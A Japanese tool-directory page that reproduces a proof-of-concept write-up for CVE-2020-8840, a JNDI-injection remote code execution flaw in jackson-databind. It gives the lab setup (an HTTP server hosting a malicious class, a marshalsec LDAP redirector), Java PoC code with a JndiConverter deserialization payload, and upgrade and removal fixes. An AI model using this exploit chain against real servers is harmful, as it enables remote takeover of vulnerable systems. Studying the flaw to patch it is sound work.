Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2020-8840 — CVE-2020-8840のPoCエクスプロイト:FasterXML jackson-databindのJNDIインジェクションによるリモートコード実行。環境セットアップ、エクスプロイトチェーン、および修復ガイダンスが含まれています。 | Kitploit
ツール/GitHubGitHub/fairyming/cve-2020-8840
脆弱性分析コード分析エクスプロイトウェブアプリケーション悪用学習と教育ラボと実践
GitHubfairyming/cve-2020-8840

CVE-2020-8840

CVE-2020-8840のPoCエクスプロイト:FasterXML jackson-databindのJNDIインジェクションによるリモートコード実行。環境セットアップ、エクスプロイトチェーン、および修復ガイダンスが含まれています。

リポジトリを見る
37716年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2020-8840:FasterXML/jackson-databind リモートコード実行脆弱性

0x00 はじめに

jackson-databind は、FasterXML プロジェクトグループに属するJSON処理ライブラリです。

0x01 脆弱性概要

2月19日、NVDはセキュリティ勧告を公開し、jackson-databind におけるJNDIインジェクションに起因するリモートコード実行脆弱性(CVE-2020-8840)を開示しました。CVSSスコアは9.8です。影響を受けるバージョンの jackson-databind では、一部の xbean-reflect/JNDI ブラックリストクラス(例:org.apache.xbean.propertyeditor.JndiConverter)が欠如しているため、攻撃者はJNDIインジェクションを利用してリモートコードを実行でき、攻撃が成功するとサーバーの制御権限(Webサービスレベル)を取得できます。

0x02 影響バージョン

2.0.0 <= FasterXML jackson-databind Version <= 2.9.10.2

0x03 環境構築

  • jdkバージョン:1.81 【ldapとrmiをJNDIインジェクションと組み合わせて使用する場合、jdkバージョンに一定の要件があります。以下の図から、Oracleによる修正時期が明確にわかります。

20190606014739_69118.jpg

1、Webサーバーディレクトリにコンパイル済みの悪意のあるクラスを配置 WX20200223-135435@2x.png ここでは simplehttp を使用して Web サーバーを構築します。

root@kitploit:~
python -m SimpleHTTPServer 8080

image.png

2、ldap サービスを起動 ここでは marshalsec を使用します。GitHub リンク:https://github.com/mbechler/marshalsec

root@kitploit:~
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://localhost:8080/#Exploit

image.png

3、Java プロジェクトを作成し、脆弱性のあるバージョンの jar パッケージをインポート WX20200223-135855@2x.png

0x04 脆弱性の悪用

  • 脆弱性悪用チェーン全体
root@kitploit:~
poc --> ldap --> http
  • poc
root@kitploit:~
import com.fasterxml.jackson.databind.ObjectMapper;
import java.io.IOException;

public class Poc {
    public static void main(String args[]) {
        ObjectMapper mapper = new ObjectMapper();

        mapper.enableDefaultTyping();

        String json = "[\"org.apache.xbean.propertyeditor.JndiConverter\", {\"asText\":\"ldap://localhost:1389/Exploit\"}]";

        try {
            mapper.readValue(json, Object.class);
        } catch (IOException e) {
            e.printStackTrace();
        }

    }
}
  • poc を直接実行し、ldap を介して Web サーバー上の悪意のあるクラスをロードすることでリモートコード実行が発生

WX20200223-140159@2x.png

0x05 修正方法

1、jackson-databind を 2.9.10.3、2.8.11.5、2.10.x にアップグレード 2、プロジェクト内で xbean-reflect が使用されているか確認。今回の脆弱性の核心的な原因は、xbean-reflect にユーザーが JNDI によるリモートクラスロード操作をトリガーできる特別な悪用チェーンが存在することです。xbean-reflect を削除することで脆弱性の影響を軽減できます。

参考リンク:

https://cert.360.cn/warning/detail?id=1fe3b5ea888750006e0d64fb0df1e6ee

https://github.com/jas502n/CVE-2020-8840

ツールをダウンロード